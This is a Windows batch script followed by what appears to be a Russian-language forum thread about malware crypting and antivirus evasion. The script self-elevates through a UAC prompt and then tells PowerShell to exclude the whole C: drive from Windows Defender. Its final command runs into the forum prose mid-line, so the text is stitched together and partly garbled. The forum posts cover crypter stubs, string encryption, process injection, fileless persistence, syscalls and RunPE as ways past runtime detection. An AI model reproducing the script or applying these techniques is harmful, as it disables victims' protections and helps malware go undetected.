@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
goto neptyn
) else ( goto godmuyiuin )
:neptyn
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
set params = %*:"="
echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
del "%temp%\getadmin.vbs"
exit /B
:godmuyiuin
pushd "%CD%"
CD /D "%~dp0"
powershell.exe -command Add-MpPreference -ExclusionPath C:\Он не сработает без прав локального админа на хосте, в чем смысл тогда?
дефендер - не единственное защитное решение, которое может стоять на компе
Ну в таком случае, блектим посоветует ему элитную приватную технику обхода ав через елку в консоли... она 100% обходит все антивири в рантайме и повышает права процесса до system
На Си такое не проктатит, только на шарпе
Он, наверное, имел ввиду, что не хочет дропать файл и запускать его, чтобы последнего не отсканил авер или в облако не отправил и тд. В таком случае имеет смысл попробовать инжекты в легитимный процесс, или прописать нагрузку в виде бесфайлового персистанса и дождаться перезагрузки компа.
О, элитные алгоритмы подъехали, еще бы туда новогоднего настроения в батник и вообще было бы збс.
Не ну с дотнетами можно готовую сборку с какой-то базовой обфускацией передавать, так как с MSIL достаточно просто и удобно работать с помощью всяких dnlib'ов и Mono.Cecil'ов. А вот с нативным кодом, конечно, куда сложнее. Можно, наверное, компилировать в LLVM IR и отдавать сервису его.
оффтоп: ты зачем его довел до ручки? Мне нравился этот простой, юный падован
как мы теперь без него
а разве сейчас криптует по другому? Шифрование строк в стабе зла бинарника(если они подготовлены для этого) или исходника, потом обфускация исходного кода стаба криптера с внедрением шифрованного тела стаба зла, потом обфускация анти-все и компиляция - на выходе ехе в 5 раз выше размером чем стаб-зла, но не палится ничем. Проблемы могут быть только с рантаймом стаба-зла.По моему вся тенденция с криптерами идет к тому что скоро будут обфусцировать исходный код, обфусцированный код передавать сервису крипта, и уже сервис крипта по своим уникальным методом будет превращать код в фарш для любой системы отладки. Так будут криптоваться в будущем как по мне
Новые обновы дефендера и сэнтинелван говорят имено об этом.
Я про рантайм и говорил. Эра криптеров XOR подходит к концу. А когда этот конец наступит - не понятно. Тренды так или иначе задают мелкомягкие. Нас ждет новое поколение обфускаторов исходных кодов которые сбивают рантайм сигнатуры, как не крути.
только одно НО, обфускато то как помогут обойти рантайм? рантайм срабатывает на параметры винапи и последовательность этих же самих винапи, а параметры ну скажим так мягко говоря шибко не обфусцируешь чтобы код не здох. А на простые действия xor sub add mov и еще с ним АВ давно забили, они сейчас смотрят общуюю энтропию рабочего кода и все, на сам же код внимания не обращают к примеру тот же детект Variant в разных интерпритациях значит что слишком много кода asm: mov или на c++: = и не соответствует общей масс call вызовов функций +winapi функций, а то что там приравнимается АВ наплевать. Второй общий фактор анализа - это взаимосвязь команд, т.е. мусора в исполняемом коде не должно быть вообще, т.к. АВ знают что все компиляторы этот мусор вычищают и оптимизируют. Более бдительно АВ смотрят секцию констант и переменных смотрят строки. По факту на текущий момент АВ выходят на общий детект и уже даже лень им называть вирусы, просто дают Variant.148473 название. Так это к чему я это все что уже давно антивирусы не ставят детекты на xor и еже с ними, НО отдать им должно на рантайме они не сосредотачиваются, т.к. понимаю что если начать жестко детектить винапи функций 6-10 - то вирусы исчезныт и у них не будет работы ))) к примеру RunPE до сих пор работает без рантайм детекта - ну это же бля бред, ДрВеб только на него реагирует и то не уверен сейчас.
смотря кто что вкладывает в понятие слова "обфускатор". надеюсь меня не будут тыкать носом в википедию?
я думал тут всем и так понятно зачем это делается) и дело тут не в том что у них работы не будет) кто понял тот понял
еще какой...
Ну обфускатор, как и в принципе криптор, может переделать вызовы апи на вызов сискола, не то чтобы это много от чего поможет, но просто, как пример.
тогда уж проще ручками переделать в исходники пару функций чем что то городить - делов 10 минут, новый рантайм детект очень редко и долго создают, его много раз тестируют если уж очень надо, а то какая нить софтина крупного ит гиганта ласты склеит по глупости АВ потом проблем не оберутся. А на живую бинарник паределывтаь под сискол - ну это извращение.
